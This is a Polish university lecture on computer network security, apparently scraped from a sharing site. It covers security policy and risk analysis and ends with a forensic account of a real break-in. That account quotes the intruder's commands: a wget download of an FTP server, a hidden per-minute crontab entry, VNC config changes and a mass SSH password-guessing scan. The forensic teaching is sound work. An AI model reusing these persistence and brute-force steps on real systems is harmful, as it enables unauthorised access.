Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński

Wielkość: px
Rozpocząć pokaz od strony:

Download "Wykład 1. komputerowych Pojęcia podstawowe główne slajdy. 5 października 2011. Igor T. Podolak Instytut Informatyki Uniwersytet Jagielloński"

Transkrypt

1 Wykład 1 Pojęcia podstawowe główne slajdy 5 października 2011 polityka Instytut Informatyki Uniwersytet Jagielloński 1.1

2 Co obejmuje bezpieczeństwo sieci? bezpieczeństwo operacyjnych bezpieczeństwo plikowych i informacji zabezpieczenie dostępu do uwierzytelnianie użytkowników i danych kryptografia i protokoły identyfikacja i uwierzytelnianie użytkowników jedno i dwukierunkowa funkcje haszujace i podpisy cyfrowe protokoły ustanawiania kluczy systemy zarzadzania kluczami dzielenie tajemnic i kryptografia grupowa systemy z wiedza zerowa kontrola dostępu i wykrywanie intruzów w systemie elektroniczny handel i elektroniczne pieniadze bezpieczne protokoły IP bezpieczeństwo oprogramowania polityka 1.2

3 Typy ataków wirusy kradzież sprzętu wewnętrzne naruszenie praw nieuprawniony dostęp odmowa dostępu do usług (DoS) włamania do systemu nieuprawniony dostęp WiFi kradzież informacji przestępstwa finansowe naruszenia telekomunikacyjne złe użycie aplikacji webowych przestępstwa przeciw aplikacjom sieciowym sabotaż polityka 1.3

4 Metody kontroli wewnętrzne audyty testowanie możliwości włamania do systemu automatyczne narzędzia kontroli audyty przez zewnętrzne firmy specjalistyczne śledzenie aktywności poczty śledzenie aktywności aplikacji webowych brak polityka 1.4

5 Czemu bezpieczeństwo jest istotne? tajność dobre ograniczenia zabezpieczaja przed udostępnieniem poufnych informacji integralność dobrze zaprojektowany system ułatwi zapewnić dokładność informacji w systemie; poprawny poziom uchroni przez zmianami czy usunięciem danych przez osoby nieuprawnione dostępność jeśli ktoś usunie lub zniszczy dane, to poprawny system pozwoli je odtworzyć Pytania: jak istotny jest komputer i przechowywane na nim dane? czy zasady w twoim przedsiębiorstwie wymagaja ustanowienia pewnych poziomów? czy audytorzy w przedsiębiorstwie wymagaja ustalonych poziomów w twoim systemie komputerowym? czy w przewidywalnej przyszłości będziesz potrzebować zwiększonego poziomu? polityka 1.5

6 Analiza ryzyka identyfikacja i ocena zasobów identyfikacja możliwych zagrożeń ocena prawdopodobieństwa ataku wektor zagrożeń źródła pracownicy, sprzataj acy, konkurencja, terroryści, pogoda, zatrudnieni z zewnatrz, wykonawcy zagrożenia kradzież lub utrata sprzętu czy informacji, ujawnienie informacji, szpiegostwo, przestępstwa finansowe, DoS, utrata i zmiana danych, błędy ludzkie, problemy sprzętowe, błędy sprzętowe, złe użycie danych, fizyczne niebezpieczeństwo cele sprzęt komputerowy i telekomunikacyjny, miejsca przechowywania danych, systemy operacyjne, oprogramowanie, dokumentacja, dane, własność intelektualna, poczta komputerowa, telefony i faksy, informacja, zdrowie i bezpieczeństwo polityka 1.6

7 Wektor zagrożeń istnieje szereg zdefiniowanych wektorów zagrożeń wykonawcy przestępstwa finansowe sprzęt telekomunikacyjny terroryści fizyczne niebezpieczeństwo zdrowie i bezpieczeństwo wektory ułatwiaja projektowanie bezpiecznego systemu pozwalaja na odpowiedzi na pytania typu Po co nam wewnętrzna kontrola jeśli mamy zaporę (firewall)? poprzez wskazanie różnych dróg polityka 1.7

8 modele lizaka pojedyncza zapora wokół zasobów (ang. lollipop) system nie zabezpieczony po przekroczeniu ogrodzenia system nie ustala poziomów nie zabezpiecza przed wewnętrznymi atakami podstawowym narzędziem jest tu zapora ogniowa (firewall) cebulkowy szereg warstw określajacych kolejne poziomy warstwy dostępu, identyfikacji, audytu, monitorowania, segmentacji, fizycznej ochrony włamywacz musi pokonać szereg kolejnych zabezpieczeń możliwe określenie poziomów zaufania często jest tylko jeden sposób identyfikacji, np. hasło większość identyfikacji może być zbudowana w postaci warstwowej polityka 1.8

9 modele strefy zaufania systemy lizaka i cebulkowy sa bardzo trudne do połaczenia, np. w przypadku połaczania firm czy też głębszej współpracy (szczególnie gdy jest czasowa) podział systemu w zależności od funkcjonalności różne poziomy zaufania do różnych części systemu konieczne bardzo dobre śledzenie interfejsów pomiędzy różnymi częściami systemu wykorzystanie reguł zapór i list kontroli dostępu ACL polityka 1.9

10 bezpieczeństwo z punktu widzenia użytkowników ograniczenia użytkowników konfiguracja systemu jest z jednej strony ograniczajaca dla użytkowników pozwalajac im na mniej, z drugiej strony wzmacnia ona użytkowników przez usunięcie niepotrzebnych zadań i zabezpieczenie przed popełnieniem błędów ograniczanie użytkowników do pewnych funkcji ograniczanie pewnych funkcji systemu ustalanie kto może korzystać z których zasobów zabezpieczenie przed niepoprawnym użyciem jak monitorować działanie planu? polityka 1.10

11 Polityka (security policy) podstawowe wskazania w jaki sposób należy chronić fizyczne i informacyjne zasoby firmy podstawowy sposób w jaki oczekiwania zarzadu względem sa tłumaczone na zestaw sprawdzalnych celów reguły polityki zawieraja reguły ułatwiajace ochronę wartościowych, tajnych, podlegajacych prawom własności zasobów wykluczyć badź zminimalizować ewentualna odpowiedzialność prawna wobec osób trzecich ograniczyć straty czy złe wykorzystanie zasobów firmy polityka reguły polityki s a w formie pisanej reguły polityki mówi a co ma być zrobione nie jak to ma być zrobione 1.11

12 reguły polityki zapewniaja tajność i spójność danych zabezpieczaja przed ich niepoprawnym użyciem pozwalaja użytkownikom zrozumieć co jest od nich oczekiwane kadra zarzadzaj aca by wiedzieli jakie sa ich role, odpowiedzialność, i jakie powinni podejmować działania kadra techniczna by wiedzieli jak, kiedy, i gdzie kontrola może być użyta w sieci komputerowej, zasobach, innym sprzęcie wszyscy zatrudnieni by wiedzieli w jaki sposób maja wypełniać codzienne obowiazki by być zgodnymi z oczekiwaniami polityka 1.12

13 tworzenie reguł polityki w tworzeniu reguł musi wziać udział wiele działów HR odpowiedzialne za zatrudnianie i karanie pracowników; zbiera od pracowników certyfikaty, że zrozumieli reguły dział prawny odpowiedzialny za reprezentację firmy wewnatrz i na zewnatrz; zgodność reguł polityki z prawem IT gdyż pracownicy tego działu sa zwykle największymi konsumentami zasobów jednak nie oni powinni być głównymi autorami reguł ochrona fizyczna polityka adresatami reguł polityki sa wszyscy pracownicy wykonawcy, kontraktorzy, konsultanci, serwis, pracownicy czasowi partnerzy biznesowi, sprzedawcy klienci korzystajacy z zasobów informacyjnych 1.13

14 organizacja polityki reguły polityki odnosza się do zwykle do administracji systemem; z jakich należy korzystać narzędzi; czego firma oczekuje od administratorów zarzadzania personelem mówia pracownikom w jaki sposób maja wykonywać codzienne zadania, np. w jaki sposób operować z wrażliwymi danymi fizycznego generalnie do wszystkich w jaki sposób radzić sobie z bezpieczeństwem fizycznym polityka reguły mówia co musi być zrobione reguły nie mówia w jaki sposób ma to być zrobione implementacja musi być oddzielona od samych reguł reguły nie moga zależeć od konkretnych technologii by być skuteczne, reguły musza być jasne i łatwe do zrozumienia 1.14

15 Rekonesans IP najpierw konieczne wykrycie prawdopodobnych nazw domen w standardowych spisach wykrycie właścicieli domen w systemach rejestrujacych wyszukiwanie wszystkich domen posiadanych przez organizację whois ICANN dla domen.com,.net,.org dla innych inne serwery whois USA: Europa:www.ripe.net, domeny.com,.org,.net,.edu: inne narzędzia whois is usługa powinna działać na porcie 43, obecnie głównie przez http polityka 1.15

16 planowanie elementów procesu bezpieczeństwo fizyczne jak zabezpieczyć sprzęt i nośniki danych to nie jest część systemu, jednak jest ściśle zwiazane aplikacje opis celów podstawowych obiektów i zasobów systemu podstawa dla dalszych kroków, nie jest wprowadzana do systemu ogólne podejście jaki będzie ogólny poziom wybór odpowiednich parametrów grupy użytkowników ustalenie zasad podziału użytkowników na grupy profile użytkowników przypisanie użytkowników do grup zdefiniowanie istotnych elementów odróżniajacych grupy bezpieczeństwo zasobów instalacje aplikacji polityka 1.16

17 planowanie elementów procesu bezpieczeństwo fizyczne aplikacje ogólna strategia jaki będzie ogólny poziom wybór odpowiednich parametrów grupy użytkowników ustalenie zasad podziału użytkowników na grupy profile użytkowników przypisanie użytkowników do grup zdefiniowanie istotnych elementów odróżniajacych grupy bezpieczeństwo zasobów które zasoby (aplikacje) powinny być dostępne dla wszystkich, które dla niektórych definicje grup użytkowników instalacje aplikacji decyzja jak ustalać własność aplikacji i bibliotek w systemie polityka 1.17

18 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? najlepiej w zamkniętym pomieszczeniu o ograniczonym dostępie utworzyć formularz fizycznego z podstawowymi odpowiedziami: jakie sa wykorzystane metody zabezpieczenia, gdzie jest przechowywany klucz do dostępu, jakie sa standardowe ustawienia, inne. gdzie przechowywać dokumentację i nośniki danych gdzie umieszczone będa wszystkie stacje robocze? gdzie drukarki? jakiego dodatkowego sprzętu potrzebujemy (okablowanie, linie telefoniczne, etc.)? co robić w przypadkach awaryjnych (pożar, zalanie wod a, etc.)? polityka 1.18

19 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? gdzie przechowywać dokumentację i nośniki danych narzędzia serwisowe i hasła dostępu administratora sa krytyczne dla działania systemu urzadzenia kopii zapasowych i media moga zostać skradzione lub zniszczone gdzie umieszczone będa wszystkie stacje robocze? stacje robocze moga być użyte przez nieuprawnione osoby (dostęp w miejscach publicznych, nienadzorowana praca w miejscach prywatnych) nie umieszczać w bardzo publicznych lub bardzo prywatnych miejscach zwracać uwagę użytkownikom na konieczność wylogowywania się z systemu po zakończeniu pracy ograniczać które funkcje systemu użytkownicy moga wykonywać w miejscach publicznych ograniczać możliwość logowania w wielu miejscach gdzie drukarki? jakiego dodatkowego sprzętu potrzebujemy (okablowanie, linie telefoniczne, etc.)? co robić w przypadkach awaryjnych (pożar, zalanie woda, etc.)? polityka 1.19

20 bezpieczeństwo fizyczne gdzie postawić sprzęt komputerowy? jakie ma wymagania? jakie sa potencjalne ryzyka (np. wyłaczenie systemu)? gdzie przechowywać dokumentację i nośniki danych narzędzia serwisowe i hasła dostępu administratora sa krytyczne dla działania systemu urzadzenia kopii zapasowych i media moga zostać skradzione lub zniszczone gdzie umieszczone będa wszystkie stacje robocze? stacje robocze moga być użyte przez nieuprawnione osoby (dostęp w miejscach publicznych, nienadzorowana praca w miejscach prywatnych) gdzie drukarki? drukarki w miejscach publicznych moga pozwolić na nieuprawniony dostęp do informacji w przypadku małej liczby drukarek może się okazać, że trzeba będzie drukować poufne wiadomości (np. czeki) w publicznych miejscach zwracać uwagę pracownikom na nie zwiazane z drukiem w publicznych miejscach nie ustawiać drukarek w publicznych miejscach drukować poufne informacje tylko w ustalonych porach utworzyć opis wszystkich drukarek wraz z zagrożeniami jakiego dodatkowego sprzętu potrzebujemy (okablowanie, polityka 1.20

21 planowanie aplikacji jakie informacje zamierzamy przechowywać w systemie? kto będzie potrzebował dostępu do tych informacji? czy użytkownicy potrzebuja dostępu tylko do czytania czy także do zmiany? konieczne jest określenie które aplikacje będa wykorzystywane do dostępu do danych tu przydatny diagram dostępu aplikacji do bibliotek polityka 1.21

22 tworzenie ogólnej strategii najpierw decyzje co do ogólnego podejścia do w systemie konieczne wyrównanie potrzeb dzisiaj i tych w przyszłości tworzenie strategii wybór poziomu uproszczony, średni, wysoki wykorzystaj opis aplikacji dla określenia kto powinien mieć dostęp do których oceń wykorzystywane w systemie technologie, np. jest czy nie ma dostępu do Internetu przedyskutuj kwestię poziomu z audytorami określ wymagania względem krytycznych zasobów: ich tajność, ich kompetytywność, ich wykorzystanie w ciagu dnia pracy wybór parametrów zwiazanych z logowaniem się użytkowników w systemie wybór parametrów zwiazanych z hasłami wykorzystanie wartości systemowych do wyregulowania systemu polityka 1.22

23 zauważyłem w historii swojego komputera ul.ii.uj.edu.pl 960 uptime 961 df -h 962 pwd 963 ps x 964 mkdir.init 965 cd.init polityka 966 wget 967 tar zxf ftpd tar.gz 968 rm ftpd tar.gz 969 mv ftp4all/*. 970 rmdir 971./configure czy to było włamanie??? 1.23

24 ściagnięty serwer ftp ftp4all, kompilacja instalacja do specjalnie zalożonej kartoteki.init w mojej kartotece domowej skopiowane wszystkie pliki z.init/bin do.init/standard/sbin, nastepnie przekopiowal standard/sbin do sbin zmiana nazwy wykonywalnego pliku na xvmr - czy z czymś się kojarzy? podkartoteka ze źródłami wymazana, jednak ftp4all jest do ściagnięcia i można powtórzyć prawdopodbne operacje w etc/ftpd.reg ustawione sa adminport numer portu obsługi dla administratora ftp port 5902 w /home/igor/.init/f numer portu gdzie serwer jest dostępny 5902 to jeden z portow wykorzystywanych przez Xvnc otwarty na komputerze włamywacz musiał wcześniej skanować porty polityka 1.24

25 W plikach msg/goodbye, msg/welcome, i msg/startup szereg zabawnych komunikatów: msg/startup: FTP server ready. Preceeding... polityka msg/welcome: Welcome, 2 Another Great Server BY, -=FLOTILLA=msg/goodbye: GOOdBye, Hope 2 See U Again SOON...(= zabawne, prawda? 1.25

26 Crontab edycja mojej lokalnej tablicy cron, polegajaca na stałym uruchamianiu pliku xvmr, patrz lokalna tablica crontab: * * * * /home/igor/.init/sbin/xvmr a więc co minutę. poprawka naniesiona była 2 sierpnia o 19:45; to lokalizuje datę włamania polityka 1.26

27 Skad to włamanie? W pliku /var/log/secure, pomiędzy wieloma nieudanymi, jest niepokojacy wpis, powtarzajacy się wiele razy August 2: 15:51:26: Address maps to sip.ber this does not map back to the address - POSSIBLE BREAKI po wykorzystaniu odwrotnego mapowania dig -x dostajemy nazwę sip.bernaunet.de, jednak mapowanie wprost dig sip.bernaunet.de zwraca adres , stad to ostrzeżenie. poszukiwanie przez WWW adresu daje stronę firmy Wikom Elektrik GmbH włamywacz uruchamia swój program z wielu miejsc na świecie (albo jest ich wielu), gdzie włamał sie juz wcześniej nie wiadomo wciaż jaki jest oryginalny adres wlamywacza polityka 1.27

28 Xvnc last -f./wtmp nie pokazuje żadnego logowanie w okolicach feralnych modyfikacji ale wykorzystał dla ftp port 5902, a więc port Xvnc, a serwer Xvnc był uruchomiony, a także klient Xvnc dostał sie pewnie przez zalogowanie do otwartego wtedy połaczenia Xvnc ekran klienta Xvnc po ponownym połaczeniu z serwerem jest czarny i nic nie pomaga w jego uaktywnieniu, a serwer Xvnc na pewno dziala Czy Xvnc zapisuje gdzieś ślady dostępu??? ostatnie polecenie włamywacza to 1000 vncconfig -set AcceptpointerEvents=0 ; vncconfig -set AcceptkeyEvents=0 ; exit w której zmienia ustawienia konfiguracji vnc! Oto znaczenia zmienionych parametrów Xvnc polityka AcceptPointerEvents: Accept pointer press and release e clients (default is on). tu włamywacz wyłaczył dzialanie myszki (pointer) 1.28

29 a co jest w środku? W kartotece.init/f sa bardzo dziwne pliki: drwxrwxr-x 5 igor igor 4096 Aug 2 19:51. drwxrwxr-x 11 igor igor 4096 Aug 2 19:41.. drwx igor igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX??? drwx------??? 2 igor igor 4096 Aug 2 19:48???? Dupe-FxP? polityka? drwx igor igor 4096 Aug 2 FLOTILLA procesu??? -rw igor igor 48 Aug 2 19:49.permissions Pliki.permissions w podkartotekach sa identyczne, jednak różne od tego w glownej podkartotece f w historii włamania jest polecenie utworzenia podkartoteki f, jednak nie sa utworzone żadne dalsze podkartoteki czy same pliki.permissions wyglada na to, że włamywacz utworzył sam serwer ftpd 1.29

30 połaczenie z serwerem następuje przez ftp ul 5902 poł aczenie z portem administracji nie powodzi się (telnet ul 60283) włamywacz albo źle zainstalowal serwer albo nie miał zamiaru nim administrować polityka 1.30

31 Błędy włamywacza nie wyczyscił historii poleceń uruchomiony proces /home/igor/.init/xvmr wyświetla się w liście procesów ps -aux grep igor nie usunał wielu zbędnych już plikow z kartoteki.init, a usunał pliki źródłowe nie zadbał o to, by crontab nie wysyłał co chwilę maila o uruchomieniu serwera, np. From Mon Aug 7 11:01: Date: Mon, 7 Aug :01: From: (Cron Daemon) To: polityka Subject: Cron /home/igor/.init/sbin/xvmr X-Cron-Env: <SHELL=/bin/sh> X-Cron-Env: <HOME=/home/igor> X-Cron-Env: <PATH=/usr/bin:/bin> X-Cron-Env: <LOGNAME=igor> X-Cron-Env: <USER=igor> FTP4ALL 3.012, Copyright (C) by Crescent (cre This program is FREE SOFTWARE and distributed under GNU 1.31 ale kto czyta pocztę roota?

32 co robić? wykasować kartotekę serwera ftpd, usunać wpis z tablicy crontab poczekać na połaczenie by wykryć włamywacza zmienić hasło uzytkownika igor sprawdzić tego użytkownika na innych komputerach ustawić blokadę dostępu do połaczeń tcp wykorzystujac tcp_wrappers sprawdzić adres użytkownika, ktory odgadł haslo polityka 1.32

33 Prosty skrypt uruchomiłem prosty skrypt #!/usr/bin/perl open(logfile, ">>slad.txt"); while(true) { $s = netstat --tcp grep "ul.ii.uj.edu.pl:5902\\ ul } if(length($s) > 0) { $d = date ; chomp $d; chomp $s; print LOGFILE "\$d:\n\$s\n"; $s = ""; } $p = sleep 60; majacy wyłapac wszelkich potencjalnych "klientów" serwera, w domyśle włamywacza, bo któż inny może o założonym serwerze wiedziec? ale może włamywacz umieścił gdzieś informację i linki o nowym serwerze? polityka 1.33

34 Ktoś korzysta! po kilku dniach plik śladu (ślad.txt) troche sie zapełnił: wlamanie]$ cat slad.txt Fri Aug 4 12:30:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 ESTABLISHE Fri Aug 4 12:31:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 ESTABLISHE Fri Aug 4 12:32:22 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 aae92.internetdsl.tpn:52760 FIN\_WAIT2 Sun Aug 6 10:39:32 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:40:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304politykaESTABLISHE Sun Aug 6 10:41:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:42:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:43:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:44:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:45:33 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:46:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 10:47:34 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl:5902 TLV bb.netv:3304 ESTABLISHE Sun Aug 6 16:49:11 CEST 2006: tcp 0 0 ul.ii.uj.edu.pl: :1253 ESTABLISHE wlamanie]$ Pierwsze 3 linijki to moja wlasna proba, reszta to 1.34

35 Ale co z tego? listing kartoteki.init/f (a wiec korzenia nowego serwera ftp) daje f]$ ll total 32 drwx igor 4096 Aug 2 19:48???? 100MBiT.PL 10GB LINUX???? drwx igor 4096 Aug 2 19:48???? Dupe-FxP????? drwx igor 4096 Aug 2 drwx igor 4096 Aug 6 10:45 Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP polityka więc, nowy użytkownik załozył nowa kartoteka Spikes.Women.of.Action w której jest trochę nowych plików: Spikes.Women.of.Action.2006.WS.PDTV.XviD-PAP]$ ll total rw igor 6518 Aug 6 10:39 PAP-Spikes.Women.of.Act -rw igor Aug 6 10:39 PAP-swoa.r00 -rw igor Aug 6 10:39 PAP-swoa.r01 -rw igor Aug 6 10:40 PAP-swoa.r02 -rw igor Aug 6 10:40 PAP-swoa.r03 -rw igor Aug 6 10:40 PAP-swoa.r04 -rw igor Aug 6 10:40 PAP-swoa.r05 -rw igor Aug 6 10:41 PAP-swoa.r

36 I co jeszcze? a w kartotece.init/f/sample jest plik -rw igor igor Aug 6 10:39 Spikes.Wom razem wiec ok. 350 MB. to po prostu aktywne kobiety, dobrej jakości filmy istnieje coś takiego jak WOA Women of Action Network dig ujawnia domenę reardenstudios.com i serwer homer.reardenstudios.com ( czyżby chcieli ułatwić sobie przekaz? polityka 1.36

37 Sprzatanie skasowany server vnc zmiana hasła użytkownika igor list do z ostrzeżeniem, gdyż jeden z ataków byl przeprowadzony z adresu , ktory mapował się na sip.bernaunet.de a ten na nawww.bernaunet.de, a to była firma Wikom Elektrik GmbH w Bernie odpowiedź w bardzo szybkim tempie (mniej niż 20 minut) z we have taken the affected machine of the net and have exchanged for another. We will analyze the log files and refund announcement against the suitable person. We apologise for your incommodities and can assure you from this server no more attack will go out. MfG bernaunet.de w odpowiedzi na pytanie o szczegóły następujaca odpowiedź a user s account ran obviously whole thus of the hackers has cracked. Then a Kernelbug must have been used with the help of the software to get root rights. polityka 1.37

38 Co robił włamywacz? loguje sie kolejno na kontach sven i potem mtvs sciaga linux3.tgz (w kartotece linux3) z members.lycos.co.uk/neneax/linux3.tgz, rozpakowuje go do kartoteki.m to jest open source irc bot written in C - patrz ściaga z tego samego adresu scanx.tgz rozpakowujac do kartoteki chyba.de (niemiecka domena - firma jest w bernie, ale w niemieckiej domenie) ściaga tez plik de, ktory jest słownikiem niemieckich imion i innych prawdopodobnych nazw użytkowników uruchamia wtedy.de/x (przykładowa nazwa domeny) ten jest skryptem uruchamiajacym.de/scan $1 22, czyli./de scan , a 22 to numer portu ssh - innymi słowy wyszukiwanie serwerów domenie wykorzystujacych ssh, zapisujac ja w pliku uniq.txt polityka 1.38

39 Co robił włamywacz? zbiera listę serwerów i uruchamia.de/xpl 100 german, a więc zapewne po 100 prób na każdym z serwerow xpl próbuje się jednocześnie połaczyc z wieloma serwerami z listy z uniq.txt na każdym próbujac tego samego użytkownika, i zapewne, to samo hasło W ten sposób wielokrotnie przyspiesza działania - mimo, że każda próba logowania trwa ok. 3 sekund, to próbujac kilkaset serwerow jednocześnie dostajemy przyspieszenie a gdzie wyniki? chyba sa online??? bo to GOT...??? albo tez sa zapisywane w pliku vuln.txt xpl jest bardzo podobne do ssh to jakaż przeróbka polityka 1.39

40 Co robił włamywacz? strings xpl pokazuje między innymi %sgot IT!! -> %s:%s:%s jest to więc jakieś wypisanie wyniku, tak jak wyżej jest GOT IT./x > billing:habl99: ale nie jest nigdy ten plik ogladany na koncu wlamywacz oglada plik vuln.txt i później (razem z log.txt, status, i uniq.txt) usuwa go mimo przyspieszenia byłoby dobrze, gdyby włamywacz nie musiał kontrolować działania bezpośrednio i wyniki logowania były wysyłane co jakiś czas dla ulatwienia polityka 1.40

41 J. Pieprzyk, T. Harjano, J. Seberry, Teoria, Springer/Helion N. Ferguson, B. Schneier, Kryptografia w praktyce, Helion B. Schneier, Kryptografia dla praktyków, Wiley / WNT D. Denning, Wojna informacyjna i bezpieczeństwo informacji, ACM/WNT A. Menezes, P. Van Oorschot, S. Vanstone, Handbook of applied Cryptography, CRC (http://www.cacr.math.uwaterloo.ca/hac/) J. Viega, M. Messier, C i C++ bezpieczne programowanie: receptury, O Reilly/Helion S. Oaks, Java a bazpieczeństwo, O Reilly/RM C. Peikari, A. Chuvakian, Strażnik danych, O Reilly/Helion polityka 1.41

BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH

BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH Igor T. Podolak Instytut Informatyki UJ 8 październik 2008 IGOR T. PODOLAK (INSTYTUT INFORMATYKI UJ) BEZPIECZEŃSTWO SIECI KOMPUTEROWYCH 8 PAŹDZIERNIK 2008 1 / 35 CO OBEJMUJE

Bardziej szczegółowo

iseries IBM SecureWay: iseries 400 i Internet

iseries IBM SecureWay: iseries 400 i Internet iseries IBM SecureWay: iseries 400 i Internet iseries IBM SecureWay: iseries 400 i Internet Copyright International Business Machines Corporation 1999,2000. Wszelkie prawa zastrzeżone. Spis treści Część

Bardziej szczegółowo

SIECI KOMPUTEROWO-TELEINFORMATYCZNYCH (SKI)

SIECI KOMPUTEROWO-TELEINFORMATYCZNYCH (SKI) Wykład 1 TEMAT: PODSTAWY BEZPIECZEŃSTWA SIECI KOMPUTEROWO-TELEINFORMATYCZNYCH (SKI) 1.1. Ogólne pojęcie bezpieczeństwa Próba określenia bezpieczeństwa za pomocą jednej definicji może okazać się nie wystarczająca.

Bardziej szczegółowo

4. Bezpieczeństwo systemu operacyjnego i aplikacji

4. Bezpieczeństwo systemu operacyjnego i aplikacji Wykl 4. 4. Bezpieczeństwo systemu operacyjnego i aplikacji Bezpieczeństwo systemu operacyjnego jest ważnym elementem bezpieczeństwa sieciowego w organizacji. Stacja robocza w strategii ochrony dogłębnej

Bardziej szczegółowo

Wyznaczenie bezpieczeństwa sieci komputerowej poprzez analizę czasową zdarzeń

Wyznaczenie bezpieczeństwa sieci komputerowej poprzez analizę czasową zdarzeń POLITECHNIKA SZCZECIŃSKA WYDZIAŁ INFORMATYKI Rozprawa doktorska Wyznaczenie bezpieczeństwa sieci komputerowej poprzez analizę czasową zdarzeń mgr inż. Grzegorz Śliwiński Promotor: prof. dr hab. inż. Jerzy

Bardziej szczegółowo

REGULAMIN EKSPLOATACJI SYSTEMÓW TELEINFORMATYCZNYCH

REGULAMIN EKSPLOATACJI SYSTEMÓW TELEINFORMATYCZNYCH Załącznik nr 12 do Zarządzenia Nr 40/2008 Agencja Restrukturyzacji i Modernizacji Rolnictwa Al. Jana Pawła II nr 70 00-175 Warszawa REGULAMIN EKSPLOATACJI SYSTEMÓW TELEINFORMATYCZNYCH SPIS TREŚCI 1. Definicje...

Bardziej szczegółowo

MONITOROWANIE SIECI, SYSTEMÓW I USŁUG

MONITOROWANIE SIECI, SYSTEMÓW I USŁUG WYŻSZA SZKOŁA INFORMATYKI STOSOWANEJ I ZARZĄDZANIA pod auspicjami Polskiej Akademii Nauk WYDZIAŁ INFORMATYKI STUDIA I STOPNIA (INŻYNIERSKIE) PRACA DYPLOMOWA Maciej Korzeń MONITOROWANIE SIECI, SYSTEMÓW

Bardziej szczegółowo

Linux. Serwery. Bezpieczeñstwo

Linux. Serwery. Bezpieczeñstwo PRZYK ADOWY ROZDZIA Wydawnictwo Helion ul. Chopina 6 44-100 Gliwice tel. (32)230-98-63 e-mail: helion@helion.pl IDZ DO KATALOG KSI EK ZAMÓW DRUKOWANY KATALOG TWÓJ KOSZYK CENNIK I INFORMACJE ZAMÓW INFORMACJE

Bardziej szczegółowo

BITDEFENDER SMALL OFFICE SECURITY

BITDEFENDER SMALL OFFICE SECURITY BITDEFENDER SMALL OFFICE SECURITY Przewodnik Partnerski Bitdefender Small Office Security Przewodnik Partnerski Data publikacji 2015.01.08 Copyright 2015 Bitdefender Uwagi prawne Wszelkie prawa zastrzeżone.

Bardziej szczegółowo

PodrÊcznik U ytkownika

PodrÊcznik U ytkownika Wies³aw M. Tr mpczy¼ski PodrÊcznik U ytkownika 2009 W.T. 1 Spis treści Projekt EOS założenia ogólne...3 Bardzo ogólnie...3 Bardziej szczegółowo...3 Zalety i Wady...4 Dodatkowe informacje...4 Instalacja

Bardziej szczegółowo

Ściany Ogniowe. Autorzy: Mirosław Bartyna, Grzegorz Lisowski, Robert Bejster IVFDS

Ściany Ogniowe. Autorzy: Mirosław Bartyna, Grzegorz Lisowski, Robert Bejster IVFDS Ściany Ogniowe Autorzy: Mirosław Bartyna, Grzegorz Lisowski, Robert Bejster IVFDS 1 STRESZCZENIE Globalny Internet wywołał prawdziwą rewolucję w sposobach prowadzenia biznesu, dostępu do informacji itp.

Bardziej szczegółowo

Maciej Kuczyński, APN Promise

Maciej Kuczyński, APN Promise 1. Prelegenci Maciej Kuczyński, APN Promise. W trakcie webinarium zaprezentujemy zagadnienia związane z zarządzaniem, które coraz mocniej wchodzą na rynek konsumencki oraz biznesowy. Tematem szóstego spotkania

Bardziej szczegółowo

GravityZone PRZEWODNIK ADMINISTRATORA

GravityZone PRZEWODNIK ADMINISTRATORA GravityZone PRZEWODNIK ADMINISTRATORA Bitdefender GravityZone Przewodnik administratora Data publikacji 2015.08.20 Copyright 2015 Bitdefender Uwagi prawne Wszelkie prawa zastrzeżone. Żadna część tej publikacji

Bardziej szczegółowo

AKADEMIA GÓRNICZO-HUTNICZA

AKADEMIA GÓRNICZO-HUTNICZA AKADEMIA GÓRNICZO-HUTNICZA Wydział Elektrotechniki, Automatyki, Informatyki i Elektroniki KATEDRA INFORMATYKI Bezpieczeństwo w systemach komputerowych Referat z przedmiotu Administrowanie Systemami Komputerowymi

Bardziej szczegółowo

PRZEWODNIK ZABEZPIECZEŃ

PRZEWODNIK ZABEZPIECZEŃ PRZEWODNIK ZABEZPIECZEŃ SYSTEMU WINDOWS 8 WRAZ Z ZAŁĄCZNIKIEM SCM WERSJA 1.0 Opracowanie powstało w ramach programu współpracy w obszarze bezpieczeństwa Security Cooperation Program (SCP) Spis treści 1.

Bardziej szczegółowo

Instrukcja obsługi programu

Instrukcja obsługi programu Instrukcja obsługi programu ArcaVir 2010 Copyright 2004-2010 by ArcaBit Sp. z o.o. Zarówno program, jak i instrukcja korzystają z pełnej ochrony określonej przepisami prawa autorskiego. Wszystkie aktualne

Bardziej szczegółowo

Podręcznik WebIssues. Wersja 1.1-beta1. Michał Męciński

